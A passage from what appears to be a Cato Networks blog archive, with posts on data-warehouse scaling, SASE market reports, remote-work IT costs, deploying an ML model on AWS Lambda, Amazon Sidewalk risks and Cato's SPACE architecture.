So how can the attacker collect all the necessary data for circumventing these systems? Threat actors have been collecting Device ID data for at least 15 years now. Researchers have seen this type of data (such as operating system, screen resolution, and time zone) collected by some of the earliest phishing attacks. Later came malware that collected this data upon infection and immediately sent it to its C&C (Command and Control) server. But as we mentioned at the start – every “solution” leads to evolution, and security researchers have upped their game at identifying the exfiltration of Device ID parameters. So what did the attackers do? They hid this data in areas they thought would be ignored or would generate false positives in security logs. Such is the case with the Houdini malware, which Cato Networks researchers have hunted down and analyzed in our 2021 Q2 report. For more information, check out the complete report.

Lessons I’ve Learned While Scaling Up a Data Warehouse

Building and maintaining a data warehouse is not an easy task, many questions need to be answered to choose which technology you’re going to use. For example: What are your use cases? These may change over time, for instance involving on-demand aggregations, ease of search, and data retention. What type of business-critical questions will you...
Lessons I’ve Learned While Scaling Up a Data Warehouse Building and maintaining a data warehouse is not an easy task, many questions need to be answered to choose which technology you’re going to use. For example: What are your use cases? These may change over time, for instance involving on-demand aggregations, ease of search, and data retention. What type of business-critical questions will you need to answer? How many users are going to use it? In this post, we will cover the main scale obstacles you might face when using a data warehouse. We’ll also cover what you can do to overcome these challenges in terms of technological tools and whether it pays to build these tools in-house or to use a managed service. Addressing these challenges could be very important for a young startup, whose data is just starting to pile up and questions from different stakeholders are popping up, or for an existing data warehouse that has reached its infrastructure limit. [boxlink link="https://www.catonetworks.com/resources/migrating-your-datacenter-firewall-to-the-cloud/?utm_source=blog&utm_medium=top_cta&utm_campaign=migrating_data_center?utm_source=blog&utm_medium=top_cta&utm_campaign=Cato_SASE_Cloud"] Migrating your Datacenter Firewall to the Cloud | Whitepaper [/boxlink] Comparing ELK vs Parquet, S3, Athena and EMR in AWS Just to set the scene, while using ELK we got to the point of having a 90TB cluster of multiple data nodes, master, and coordinator. These 90TB represented 21 days of data. Aggregations took a long time to run and most of the time failed completely. ELK’s disks were the best, yet most expensive AWS had to offer. Moving to Parquet, S3, Athena and EMR allowed us to save more than double, in terms of timeframe, for the same storage volume, while dramatically reducing costs and extending our abilities. I will explain more about the differences between these technologies and why you should consider choosing one and not another. [caption id="attachment_18272" align="alignnone" width="1228"] Figure 1: Benchmark comparing ELK vs Parquet-based data warehouse. Our conclusion: With Parquet, we could achieve more and pay less, while having more data when needed.[/caption] Self-Managed ELK – The Classic Choice Many will choose ELK as their data warehouse technology. The initial setup in this case is fairly easy, as well as data ingestion. Using Kibana can help you explore the data, its different data types and values, and create informative aggregate dashboards to present ideas and stats. But when it comes to scale, using this technology can become challenging and create a great deal of overhead and frustration. Scale Problems The problem with ELK starts with aggregations. As data volumes grow, aggregations can become heavy tasks. This is because Elasticsearch calculates aggregations on a single node, making it harder for ELK to deal with large amounts of data. This means that if you need aggregate tables over time, you must aggregate during processing. Overhead of managing a cluster on your own As data volumes grow, managing a cluster on your own can become a very big headache. It requires manual work from your SRE team and sometimes can lead to the worst - downtime. Managing a cluster on your own may include the following: Managing the disks and their volume types Adding capacity requires additional nodes be added to your ELK cluster In accordance with your original partitioning methods, data can become skewed. This means more data will reach a specific node as opposed to another and it means you will have to manually configure data balancing between different data shards Using a managed service, and not a self-managed one, can be considered expensive, but it can also save you these efforts and their price (financial or mental). The Alternative: Parquet and Why It’s So Important When it comes to scale, Parquet file format can save the day. It is a columnar file format, so you can read every column on its own instead of having to read the entire file. Reading just a column allows the search engine to invest fewer resources when scanning less data. Parquet is also compressed, meaning you can get to as low as 10% of a normal JSON file, which is very important when it comes to storage. Scanning a Parquet file by the query engine does not mean the query engine has to uncompress the entire file in advance - compression is done on every column on its own. Your storage can stay with compressed Parquet files, and the query engine will handle it in accordance with the selected columns. For us at Cato Networks, moving to Parquet meant that we could use the same storage volume and store up to three times more data in terms of timeframe than we could when using ELK, reducing our costs by 50%. Many distributed query engines now support Parquet. For instance, you can find Presto and Druid applicable for Parquet usage. [caption id="attachment_18279" align="alignnone" width="876"] Figure 2: Parquet file format structure is essential in gaining scaling efficiencies. Data is divided into rows, group, and columns with respective metadata parts used for efficient file scanning[/caption] Our Approach: S3, Athena, and EMR We gave up our self-managed ELK for a combination of S3 with Athena and EMR in AWS. We converted our data from JSON files that were headed towards ELK to Parquet and uploaded them to S3. AWS then offers a few methods on how to access the data. Athena Athena is a managed query service offered by AWS. It uses Presto as an underlying engine, and lets you query files you store on S3. Athena can also work with many file formats like CSV or JSON, but these can lead to a serialization overhead. Using Athena along with Parquet means you can expect optimal query results. Every query you execute will get the computing power resources it needs. The data will be automatically distributed among nodes behind the scenes, so you don't have to worry about configuring anything manually. EMR EMR is another managed service offered by AWS that lets you instantly create clusters to execute Spark applications, without any configuration overhead. Since your data is on S3, it even saves you the overhead of configuring and managing HDFS storage. Using EMR is a great method if you’ve ever considered Spark but couldn’t or wouldn’t invest the resources required to bring up such a heavy cluster. Being able to use Spark is a great addition to a data warehouse, however it is relatively hard or even impossible while having your data saved in Elasticsearch storage. Utilization Athena and EMR can sometimes be used for the same use cases, but they have many differences. When you are using EMR data persistence is available on disk or in memory, to save reading the data more than once. This is not an option in Athena, so multiple queries will result in recurring API calls for the same Parquet files. Another difference between the two, in terms of usability, is that while using Athena can be done using SQL syntax only, using Spark and EMR requires writing code. It can be either Python, JAVA, or Scala, but all those require a wider context than SQL. Additionally, Spark requires some configuration in terms of nodes, executors, memory, etc. These configurations, if not selected correctly, can lead to OOM. Athena queries can also end with an “exhaustion” message, but this only means you need to scan less data - there is nothing else you can do about it. Wrapping Up While using all of the above, we faced many scaling problems, extended our research and data mining capabilities, and saved many hours of manual work thanks to a fully working managed service. We can store our data for longer periods, use old data only when needed and do practically whatever we want with the newest data at all times. Moving to a new technology and neglecting old code and infrastructure can be considered challenging. It puts in question the actual reason manual work was done in the first place. Although challenging, it is an effort worth finding resources for. The technology you use should evolve together with the scale of your data.    

The 2021 Strategic Roadmap for SASE Convergence

Understanding the 2021 Strategic Roadmap for SASE Convergence In July 2019, Gartner coined the term Secure Access Service Edge (SASE) to define the next generation of network security technology. SASE solutions acknowledge that modern networks and security challenges are very different from the past. By integrating core security capabilities into a single service and moving...
The 2021 Strategic Roadmap for SASE Convergence Understanding the 2021 Strategic Roadmap for SASE Convergence In July 2019, Gartner coined the term Secure Access Service Edge (SASE) to define the next generation of network security technology. SASE solutions acknowledge that modern networks and security challenges are very different from the past. By integrating core security capabilities into a single service and moving them to the cloud, SASE meets the needs of the modern digital business. In March, Gartner published this year’s 2021 strategic roadmap for SASE convergence, which details how organizations can transition from legacy security architectures to fully integrated SASE deployments. I highly recommend that you check out the report for yourself as it provides a clear and compelling vision for organizations looking to start or continue their journey to SASE. [boxlink link="https://www.catonetworks.com/resources/cato-sase-cloud-the-future-sase-today-and-tomorrow/?utm_source=blog&utm_medium=top_cta&utm_campaign=Cato_SASE_Cloud"] Cato SASE Cloud: The Future SASE – Today and Tomorrow | eBook [/boxlink] Architectural Transformation is Driving SASE Forward Gartner’s claim that SASE is “the future of network security” is based on the fact that corporate networks and infrastructures are evolving and legacy security solutions are not keeping up. In the past, companies could rely on a patchwork of perimeter-based security solutions to protect corporate assets located in on-premises data centers against attack. The modern enterprise has moved many or all of its IT assets to the cloud to take advantage of the increased flexibility and scalability that it provides. As the traditional network perimeter dissolves and organizations move more quickly, security must become software-defined and cloud-delivered to effectively protect organizations against evolving threats. Attempting to protect the modern enterprise with a legacy security architecture is unscalable and inefficient. The average organization has dozens of standalone security solutions to configure, monitor, and maintain, often with lean security teams. As a result, many organizations struggle to secure their existing infrastructure let alone securely adapt to changing requirements, such as the adoption of work from home or hybrid work models as a result of the COVID-19 pandemic. As organizations' infrastructure and business needs evolve, they require modern SASE Architecture to meet their security requirements. Some of the main SASE Benefits to the modern enterprise include: Solution Integration: SASE includes a full network security stack. Cloud-Native Security: SASE is hosted in the cloud, making it well suited to securing distributed organizations and cloud-hosted applications. Flexibility: As a cloud-native solution, SASE offers greater scalability and lower cost than appliance-based solutions. Network Optimization: SASE solutions include SD-WAN network optimization over encrypted links between SASE PoPs (points of presence). Short Term Solutions and Recommended Deployment of SASE The goal of Gartner’s strategic roadmap for SASE adoption is to help enterprises make the move from legacy security architectures to SASE. In many cases, existing commitments and limited resources make it impossible for these organizations to make the jump all at once. Gartner breaks the process into manageable steps to help organizations work through the process. Gartner defines a number of short-term goals for organizations making the move to SASE. These goals include: Deploying Zero Trust Network Access (ZTNA): With the rapid growth of remote work, replacing legacy virtual private networks (VPNs) for remote users is a major priority. The ZTNA capabilities of SASE make it a more secure alternative to legacy remote access solutions that allows organizations to implement their zero trust strategies to better protect their data and users. Creating a Phase-Out Plan: Gartner recommends performing a complete equipment and contract inventory and developing a timeline for phasing out on-premises perimeter and branch security appliances. These solutions can then be replaced with SASE capabilities hosted in the cloud. Consolidating Vendors: SASE offers complete integration of a wide range of security capabilities, eliminating the need for standalone solutions from multiple vendors. Making the switch to SASE simplifies and streamlines every aspect of security from solution acquisition to long-term monitoring and maintenance. Performing Branch Transformation: Security appliances deployed at each physical location creates a complex and sprawling security architecture. Working to move these solutions to the cloud centralizes and simplifies an organization’s security. In addition to these short-term goals, Gartner also outlines a number of long-term goals that an organization should pursue. These largely focus on taking advantage of the security integration and ZTNA capabilities of SASE to centralize and streamline security operations across the enterprise. Achieving even these short-term goals can be a significant milestone for an organization. Most companies will need to develop a multi-year strategy for making the move to SASE. While this strategy will differ from one company to another, Gartner makes one recommendation that applies across the board: start the process today. To learn more about how to start your transition to SASE, don’t hesitate to contact us or request a demo today.    

Horizon for SASE Adoption Shortens, Fewer Sample Vendors Identified in SASE Category of Gartner Hype Cycle for Networking, 2021

Every year, Gartner issues its annual take on the networking industry, and this year is no different. The just-released Hype Cycle for Enterprise Networking, 2021 and Hype Cycle for Network Security, 2021 provide snapshots of which networking and security technologies are on the rise — and which aren’t. And when it comes to secure access...
Horizon for SASE Adoption Shortens, Fewer Sample Vendors Identified in SASE Category of Gartner Hype Cycle for Networking, 2021 Every year, Gartner issues its annual take on the networking industry, and this year is no different. The just-released Hype Cycle for Enterprise Networking, 2021 and Hype Cycle for Network Security, 2021 provide snapshots of which networking and security technologies are on the rise — and which aren’t. And when it comes to secure access service edge (SASE), the two reports provide an optimistic picture. The SASE market continues to mature, as evidenced by the horizon for widespread adoption. The horizon reduced significantly this year, dropping from 5-10 years in last year’s “Hype Cycle for Enterprise Networking 2020” to just 2-5 years in this year’s report. At Cato Networks, we’ve certainly seen that change. Today, more than 900 customers, 11,000 sites and cloud instances, and well over a quarter of a million remote users rely on Cato every day. And we’ve seen large deployments, like Sixt Rent A Car, rely on the global Cato SASE platform to connect its more than 1,000 sites. “Over the past year, we’ve seen larger enterprises adopt SASE,” says Yishay Yovel, CMO at Cato Network. “Converging networking and security into the global Cato SASE Cloud enables these enterprises to become more efficient and agile in addressing critical business initiatives for cloud migration, widespread remote access, and business restructuring and transformation.” [boxlink link="https://go.catonetworks.com/2021-Gartners-Hype-Cycle-for-Enterprise-Networking.html?utm_source=blog&utm_medium=upper_cta&utm_campaign=hypecycle_report"] Gartner® Hype Cycle™ for Enterprise Networking 2021 - Get the Report [/boxlink] Cato Identified as a Sample Vendor for SASE The reports also identify Cato as a Sample Vendor for the SASE category for the third year in a row. In addition, the number of sample vendors identified in the SASE category narrowed from 10 vendors to 6 vendors with the emergence of challenges delivering a cloud-native global SASE service. In addition, Cato is only one of two vendors to be identified as a Sample Vendor in the SASE, ZTNA, and FWaaS categories, arguably the three most important sections for a SASE vendor. Zscaler is the second vendor, but, in our opinion, Zscaler is an SWG and lacks the NGFW enforcement and inspection of branch-to-datacenter traffic critical to enterprise deployments. “We believe our recognition as a Sample Vendor across SASE, ZTNA, and FWaaS categories attest to Cato’s proven capabilities in delivering a complete networking and security platform for the enterprise,” says Shlomo Kramer, CEO and co-founder of Cato Networks. “Through our Cato SPACE architecture, we provide the only global, cloud-native SASE solution that can be deployed, simply and easily, by organizations of all sizes to enable optimal and secure access to anyone, anywhere, and to any application.” To learn more about the Hype Cycle for Networking, download your copy today.   Gartner Disclaimer  Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.    

Work from Anywhere Survey Finds Dramatic Increase in IT Cost

The COVID-19 pandemic only served to accelerate the growing shift to work from anywhere. Due to the forced, but positive, experiment with remote work, many enterprises plan to continue supporting remote work indefinitely. However, the shift to remote work occurred suddenly, catching many enterprises unprepared. In Cato’s recent WFA Survey, 78% of IT professionals were...
Work from Anywhere Survey Finds Dramatic Increase in IT Cost The COVID-19 pandemic only served to accelerate the growing shift to work from anywhere. Due to the forced, but positive, experiment with remote work, many enterprises plan to continue supporting remote work indefinitely. However, the shift to remote work occurred suddenly, catching many enterprises unprepared. In Cato’s recent WFA Survey, 78% of IT professionals were found to be spending more time supporting the remote workforce since the pandemic outbreak. 47% of participants experienced an increase of at least 25%, and 16% of participants suffered from an increase of over 50%. [boxlink link="https://www.catonetworks.com/resources/the-future-of-enterprise-networking-and-security-2021-survey/?utm_source=blog&utm_medium=upper_cta&utm_campaign=survey_report?utm_source=blog&utm_medium=top_cta&utm_campaign=masterclass_4"] Get the 2021 Networking Survey Report[/boxlink] Continued IT Challenges The rapid transition to remote work created a scramble as enterprises tried to suddenly set up remote workforces. And, over a year later, companies are still struggling to effectively support remote work. One of the primary challenges for enterprises is effectively securing their remote workforce. Nearly half of the respondents say they can’t provide the same level of security to remote users as in the office. This leaves the enterprise vulnerable to phishing and other Internet-borne attacks. A significant driver of this is the reliance on legacy solutions for secure remote access. Early in the pandemic, the limitations of virtual private networks (VPNs) became plain as a massive increase in remote workers overloaded existing infrastructure. In response, companies adopted workarounds that unfortunately sacrificed enterprise security for performance. Working from home also has a significant impact on employee productivity. Issues with VPN infrastructure mean that remote users have unstable connections to the corporate network. Additionally, 30% of the respondents claim that application performance is worse when working remotely compared to working from the office. Without the necessary infrastructure to support them, remote workers are not able to perform at their full potential, which hurts the business and its bottom line. How the Hybrid Working Model Impacts IT Issues with network connectivity and application performance create additional work for corporate IT departments. The shift to work from anywhere means that support requests, and the time spent on addressing them, have increased dramatically. The biggest issue faced by IT due to the shift to remote work is that employees no longer have stable, high-performance access to corporate resources. The complexity of addressing these problems has also grown by orders of magnitude. In the past, IT was responsible for ensuring that each branch location had reliable, high-speed access to corporate assets. Now, IT must provide the same guarantees to employees that could be working from anywhere. The shift to the new hybrid working model has created significant costs for organizations. Poor network and application performance affects employee productivity. And, IT focused on addressing support tickets, lacks the time and resources for infrastructure upgrades and other tasks. Many enterprises have already experienced the increased costs associated with work from home, but may struggle to quantify it. SASE Gives Enterprises Adaptability The high costs of work from anywhere stem from the fact that companies are using legacy technologies to support their remote workers. Secure Access Service Edge (SASE) enables the distributed enterprise to achieve the security and performance it needs in a sustainable and scalable way. SASE converges SD-WAN, network security, and Zero Trust Network Access (ZTNA) into a global, cloud-native service. It optimizes and secures application access for all users and locations. Enterprises that had already adopted SASE were prepared for the pandemic and are ready for the new work from anywhere reality. Employees could connect from anywhere and have their traffic optimally and securely routed to corporate resources. More enterprises are adopting SASE, which is a positive indication that the industry is moving in the right direction, the SASE direction. In January 2021, 19% were actively planning for a SASE deployment in the next 12 months. Just six months later, this number has increased by more than 10%. In January 2021, only 27% were considering SASE, and six months later, over 40% indicated they were considering SASE. Post-COVID, work from anywhere is here to stay. Contact us and request a demo to learn how to reduce costs and IT service requests and better support your distributed workforce.    

Shrinking a Machine Learning Pipeline for AWS Lambda

Using AWS Lambda for deploying machine learning algorithms is on the rise. You may ask yourself, “What is the benefit of using Lambda over deploying the model to an AWS EC2 server?” The answer: enabling higher throughput of queries. This scale-up may challenge an EC2 server, but not Lambda. It enables up to 2,000 parallel queries....
Shrinking a Machine Learning Pipeline for AWS Lambda Using AWS Lambda for deploying machine learning algorithms is on the rise. You may ask yourself, “What is the benefit of using Lambda over deploying the model to an AWS EC2 server?” The answer: enabling higher throughput of queries. This scale-up may challenge an EC2 server, but not Lambda. It enables up to 2,000 parallel queries. However, troubles begin when it comes to the Lambda deployment package. The code, dependencies and artifacts needed for the application comprising the nearly 500MB deployment package must sum up to no more than 256MB (unzipped). [boxlink link="https://www.catonetworks.com/resources/single-pass-cloud-engine-the-key-to-unlocking-the-true-value-of-sase?utm_source=blog&utm_medium=upper_cta&utm_campaign=space_wp?utm_source=blog&utm_medium=top_cta&utm_campaign=masterclass_4"] SPACE: The Key to Unlocking the True Value of SASE (eBook) [/boxlink] From 500MB to 256MB, that’s a significant difference. Let me show you how our team approached this challenge, which ended with deploying a complex machine learning (ML) model to AWS Lambda. The Problem: The Size of the Deployment Package We wanted to deploy a tree-based classification model for detecting malicious Domains and IPs. This detection is based on multiple internal and external threat intelligence sources that are transformed into a feature vector. This feature vector is fed into the classification model and the model in turn, outputs a risk score. The pipeline includes the data pre-processing and feature extraction phases. Our classification tree-based model required installing Python XGBoost 1.2.1 that requires 417MB. The data pre-processing phase requires installing Pandas 1.1.4 that requires 41.9MB and Numpy 1.19.4 that costs an additional 23.2MB. Moreover, the trained pickled XGBoost model weighs 16.3MB. All of which totals 498.4MB. So how do we shrink all of that with our code, to meet the 256MB deployment package limitation? ML Lambda The first step is to shrink the XGBoost package and its dependencies, do we really need all the 417MB of that package? Removing distribution Info directories (*.egg-info and *.dist_info) and testing directories together with stripping the .so files will reduce the XGBoost package space usage to 147MB. Summing up the packages with joblib, numpy and scipy results in 254.2MB, which is suitable for a Lambda layer. This shrunken Lambda layer is going to serve as our first Lambda function which mainly queries the ML model with a feature vector and returns a classification scoring. The feature vector is generated from multiple internal and external threat intelligence data sources. The data is pre-processed and transformed into decimal values vector, and then fed to our classification model, generating a risk score. But who is responsible for generating this feature vector? Feature Extraction Lambda To generate the feature vector, you need to build a feature extraction pipeline. Since we’re out of space in the first Lambda function, we’ll create another Lambda function for it. Feature Extraction (FE) Lambda gets an entity as an input, queries the relevant sources, then weighs and transforms this data to a feature vector. This feature vector is the input for the first Lambda function, which in turn – returns the classification result. The FE Lambda function imports some third-party packages for the data retrieval. Also, since we’ve gathered some information from various databases, we’ll need Pymysql and Pymongo. Finally, for the data cleaning and feature extraction we’ll need Pandas and Numpy. All this sums up to 111MB, which is clearly suitable for the 256MB per Lambda deployment package limitation. But you may ask yourself, where is the model? Don’t you add it to the deployment package? Actually, it’s not needed. Since the model is trained once and then executed on each function call, we can store the Pickled- trained model on S3 and download it using boto3 on each function call. That way we separate the model from the business logic, and we can swap between models easily without changing the deployment package. Lambda Functions Inter-communication Another concern is the two Lambda functions’ inter-communication process. We’ve used the REST API in the API Gateway service, using GET for the FE Lambda – since its input is just a single string entity. For the ML Lambda we’ve created a REST API using POST – since this Lambda input is a long feature vector. That way, the FE Lambda gets an entity as an input and it queries third-party data sources. After the data retrieval is finished, it cleans the data and extracts the feature vector, which in turn is sent to the ML Lambda for prediction. [caption id="attachment_17785" align="alignnone" width="300"] 1 Lambda function inter-communication using API Gateway[/caption] Modularity Another positive side effect of splitting the process into two Lambda functions, is modularity. This split enables you to integrate additional ML models to work in parallel to the original ML model. Let’s assume we decide to transform our single ML model pipeline into an ensemble of ML models, which output a result based on the aggregation of their stand-alone result. It becomes much easier when the FE pipeline is totally excluded from the ML pipeline, and that modularity can save much effort in the future. Wrapping up So, we have two main conclusions. The first step of moving a ML pipeline to a serverless application is understanding the hardware limitations of the platform. The second conclusion is that these limitations may require ML model adaptations and must be considered as early as possible. I hope you find the story of our struggles useful when moving your ML to a serverless application, the efforts needed for such a transition will pay off.  

The New Shadow IT: How Will You Defend Against Threats from Amazon Sidewalk and Other “Unknown Unknowns” on Your Network?

Amazon has recently enabled Sidewalk on its devices, raising security and privacy concerns for consumers. But those devices also lurk in many enterprise networks. How can your organization protect itself from these unknown threats? Security discussions usually revolve around known or perceived threats – ransomware, phishing, social engineering — and which security practices can address...
The New Shadow IT: How Will You Defend Against Threats from Amazon Sidewalk and Other “Unknown Unknowns” on Your Network? Amazon has recently enabled Sidewalk on its devices, raising security and privacy concerns for consumers. But those devices also lurk in many enterprise networks. How can your organization protect itself from these unknown threats? Security discussions usually revolve around known or perceived threats – ransomware, phishing, social engineering — and which security practices can address them. Which is well and good, but, as the recently deceased Donald Rumsfield put it, what about the unknown unknowns of cyber security? A recent example is the launch of Amazon Sidewalk – a new feature for Amazon devices that constructs a shared network between devices such as Amazon Echo devices, Ring Security Cams, outdoor lights and more. Sidewalk is meant to be a low-bandwidth wireless network that can connect devices in hard-to-reach places. [boxlink link="https://catonetworks.easywebinar.live/registration-88?utm_source=blog&utm_medium=top_cta&utm_campaign=masterclass_4"] Cybersecurity Master Class: Episode 4: Supply chain attacks & Critical infrastructure [/boxlink] But numerous security concerns have also been raised about Sidewalk. While some of the consumer security concerns that have been raised seem like hyped security FUD, others raise valid alarms for any security-minded individual: Sidewalk’s automatic opt-in – Dot, Ring, Echo, Tile and other devices enable Sidewalk automatically unless the user explicitly opted out. This is not behavior enterprises would expect from their devices. Sidewalk’s new encryption method – Doing encryption right is not an easy task, especially when introducing new methods. While Amazon promises its triple encryption will make data transfer safe, their new methodology has not been battle tested yet. Updating and patching – Devices always need to be managed and kept patched. Even if you patch all your connected devices, Sidewalk is now connecting devices to your network that may not be up to date. Third-party data access – Sidewalk devices will share data with third parties in the future as well as integrate with third party compatible devices. How can any enterprise make statements its risk preparedness when risk-filled consumer devices might be inhabiting the organization’s network?? This is far from an academic exercise. The Cato Networks Research Team analyzed the network traffic of dozens of enterprises and found hundreds of thousands of flows generated by Amazon Alexa-enabled devices. And Alexa isn’t the only consumer device or application lurking on your company’s networks. After analyzing 190B network flows as part of Cato Networks SASE Threat Research Report for Q1 of 2021, we discovered flows from many consumer applications and services, such as TikTok, TOR nodes, and Robinhood, on enterprise networks. Shadow IT: A More Urgent Problem with Work from Anywhere Policies Unidentified applications and devices and Shadow IT in general have always posed a security risk. What has changed now, however, is the shift to remote work. With the introduction of the home office into your corporate network, home-connected devices with all of their vulnerabilities suddenly become part of your network. And to make matters worse, visibility into those networks diminishes leaving you with a blind spot in your security defenses. These risks can only be identified if the organization has complete visibility to ANYTHING connecting to its corporate network. This is where SASE comes into the picture. By operating at the network level for all devices and users — in the office and at home — you can see every network flow and every device on your network, giving you visibility to the unknown unknowns of your network.    

Single Pass Cloud Engine (SPACE): The Key to Unlocking the True Value of SASE

When Gartner introduced Secure Access Service Edge (SASE) in 2019, it caught the market by surprise. Unlike many advancements in technology, SASE wasn’t a new networking capability, or an answer to an unsolved security mystery. Rather, it was addressing a mundane, yet business-critical question: how can IT support the business with the expected security, performance,...
Single Pass Cloud Engine (SPACE): The Key to Unlocking the True Value of SASE When Gartner introduced Secure Access Service Edge (SASE) in 2019, it caught the market by surprise. Unlike many advancements in technology, SASE wasn’t a new networking capability, or an answer to an unsolved security mystery. Rather, it was addressing a mundane, yet business-critical question: how can IT support the business with the expected security, performance, and agility in an era marked by growing technical and operational complexity? Gartner has answered that question by describing a SASE architecture as the convergence of multiple WAN edge and network security capabilities, delivered via a global cloud service that enforces a common policy on all enterprise edges: users, locations, and applications. This new architecture represented a major challenge for the incumbent vendors who dominated IT networking and security with a myriad of disjointed point solutions. It was their architectures and designs that were largely responsible for the pervasive complexity customers had to deal with over the past 20 years. Why was the SASE architecture such a challenge for them? Because following Gartner’s framework required a massive re-architecture of legacy products that were never built to support a converged, global cloud service. This is exactly where Cato Networks created a new hope for customers, by innovating the Cato Single Pass Cloud Engine (SPACE). Cato SPACE is the core element of the Cato SASE architecture and was built from the ground up to power a global, scalable, and resilient SASE cloud service. Thousands of Cato SPACEs enable the Cato SASE Cloud to deliver the full set of networking and security capabilities to any user or application, anywhere in the world, at cloud scale, and as a service that is self-healing and self-maintaining. [boxlink link="https://www.catonetworks.com/resources/single-pass-cloud-engine-the-key-to-unlocking-the-true-value-of-sase/?utm_source=blog&utm_medium=top_cta&utm_campaign=space_wp"] Single Pass Cloud Engine: The Key to Unlocking the True Value of SASE (eBook) [/boxlink] Why Convergence and Cloud-Native Software are Key to True SASE Architecture SASE was created as a cure to the complexity problem. Approaches that maintain separate point solutions remain marked by separate consoles, policies, configurations, sizing procedures and more. In short, they drive complexity into the IT lifecycle. Furthermore, such approaches introduce multiple points of failure and additional latency from decrypting, inspecting, and re-encrypting packets within every point solution. Convergence was the first step in reducing complexity by replacing the many capabilities of multiple point solutions with a single software stack. The single software stack is easier to maintain, enables more efficient processing, streamlines management through single pane of glass, and more. Convergence, though, has strategic benefits, not just operational ones. A converged stack can share context and enforce very rich policies to make more intelligent decisions on optimizing and securing traffic. This isn’t the case with point solutions that often have limited visibility depending on how they process traffic (e.g. proxy), and what kind of information was deemed necessary for the specific function they provide. For example, a quality of service engine may not be able to take identity information into account, and IPS rules will not consider the risk associated with accessing a particular cloud application. Cloud-native is building on the value of convergence by enabling the scaling and distribution of the converged software stack. The converged stack is componentized and orchestrated to serve a very large number of enterprises and the traffic flowing from their users, locations, and applications to any destination on the WAN or Internet. The orchestration layer is also responsible for the globalization, scalability, and resiliency of the service by dynamically associating traffic with available processing capacity. This isn’t a mere retrofit of legacy product-based architectures, but rather a creation of a totally new service-based architecture. Cato SPACE: The Secret Sauce Underpinning the Cato SASE Architecture The Cato SASE Cloud is the global cloud service that serves Cato’s customers. Each enterprise organization is represented inside the Cato SASE Cloud as a virtual network that is dynamically assigned traffic processing capacity to optimize and secure the customer’s traffic from any edge to any destination. The Cato SASE Cloud is built on a global network of Cato SASE Points of Presence (PoPs). Each PoP has multiple compute nodes each with multiple processing cores. Each core runs a copy of the Cato Single Pass Cloud Engine, Cato SPACE, the converged software stack that optimizes and secures all traffic according to customer policy. These are the main attributes of the Cato SPACE: Converged software stack, single-pass processing: The Cato SPACE handles all routing, optimization, acceleration, decryption, and deep packet inspection processing and decisions. Putting this in “traditional” product category terms, a Cato SPACE includes the capabilities of global route optimization, WAN and cloud access acceleration, and security as a service with next-generation firewall, secure web gateway, next-gen anti-malware, and IPS. Cato is continuously extending the software stack with additional capabilities, but always following the same SASE architectural framework. Any customer, edge, flow: The Cato SPACE is not bound to any specific customer network or edge. Through a process of dynamic flow orchestration, a particular edge tunnel is assigned to the least busy Cato SPACE within the Cato SASE PoP closest to the customer edge. The Cato SPACE can therefore handle any number of tunnels from any number of customers and edges. This creates an inherently load balanced and agile environment with major advantages as we discuss below. Just-in-time contextual policy enforcement: Once assigned to a Cato SPACE, the flow’s context is extracted, the relevant policy is dynamically pulled and associated with the flow, and traffic processing is performed according to this context and policy. The context itself is extremely broad and includes network, device, identity, application, and data attributes. The context is mapped into policies that can consider any attribute within any policy rule and are enforced by the Cato SPACE. Cloud-scale: Each Cato SPACE can handle up to 2gbps of encrypted traffic from one or more edge tunnels with all security engines activated. Edge tunnels are seamlessly distributed within the Cato SASE Cloud and across Cato SPACEs to adapt to changes in the overall load. Capacity can be expanded by adding compute nodes to the PoPs as the Cato SPACEs are totally symmetrical and can be orchestrated into the service at any time. Self-healing: Since Cato SPACEs are identical and operate just-in-time, any Cato SPACE can take over any tunnel served by any other Cato SPACE. The orchestration layer moves the tunnels across Cato SPACEs in case of failures. If a Cato PoP becomes unreachable, edge tunnels can migrate to a Cato SPACE in a different Cato SASE PoP. This can occur within the same region or across regions according to customer policy. Customers no longer have to design failover scenarios for their regional hubs, Cato SASE Cloud inherently provides that resiliency automatically. Self-maintaining: Cato DevOps, Engineering and Security teams are responsible for maintaining all aspects of the Cato SASE Cloud. Software enhancements and fixes are applied in the background across all Cato PoPs and Cato SPACEs. New IPS rules are developed, tested, and deployed by Cato SOC to address emerging threats. Cato DevOps and NOC teams performs 24x7 monitoring of the service to ensure peak performance. Customers can, therefore, focus on policy configuration analytics using Cato’s management console that provides a single-pane-of-glass to the entire service. Cato SPACEs vs Cloud Appliances: You can’t build a cloud service from a pile of boxes Cato SPACEs are built for the cloud and cloud-hosted appliances are not. This means the use of appliances eliminates many of the agility, scalability, and resiliency advantages provided by a SASE service based on a cloud-native service architecture.   Capability  “Cloud” Appliance   Cato SPACE  Single-pass Processing  Partial. This depends on the appliance’s software build, and how many other capabilities need to be service chained for a full solution.   Yes. All capabilities are always delivered within the Cato SPACE architectural framework.   Any customer, edge, flow  No. Each customer is allocated one or more appliances in one or more cloud provider operating regions.   Yes. Any customer, edge, or flow can be served by any of the thousands of Cato SPACEs throughout the Cato SASE Cloud.   Load balancing  No. The regional edges are hard bound to specific appliances. With limited or no load balancing, capacity must be sized properly to handle peak loads.   Yes. The cloud service orchestration layer load balances customers’ edges across Cato SPACEs.   Cloud-scale  No. Appliances do not create a cloud scale architecture. The operating model assumes traffic variability is low so manual resizing is needed to expand processing capacity. The current limit of appliance-based SASE services is 500mbps.   Yes. Cato SPACEs are dynamically assigned edge tunnels to accommodate increase in load. This requires no service reconfiguration. Cato handles the capacity planning of deploying Cato SPACEs to ensure excess capacity is available throughout the cloud.  The current limit of Cato SPACE is 2gbps across one or more edge tunnels.  Resiliency   Partial. Resiliency must be designed for specific customers based on expected appliance failover scenarios (HA pair inside a pop, standby appliance in alternate PoPs). Design must be tested to ensure it is working.   Yes. Cato automatically handles failover inside the service by migrating edge tunnels between Cato SPACEs within the same PoP or across PoPs. This is an automated capability that requires no human intervention or pre-planning. Cato implemented many lessons learned over the years on the best way to approach resiliency without disrupting ongoing application sessions.  Globalization  Limited. Most SASE providers are relying on hyperscale cloud providers. Gartner warned that such designs will limit the reach of these SASE services to the hyper-scalers compute PoP footprint and roadmap.    Unlimited and growing. Cato deploys its own PoPs everywhere customers need our service to support their business. We control the choice of location, datacenter, and carriers to optimize for global and local routing. We also control IP geo localization and degree of sharing.   SASE Architecture Matters. Choose Wisely. SASE was called a transformational technology 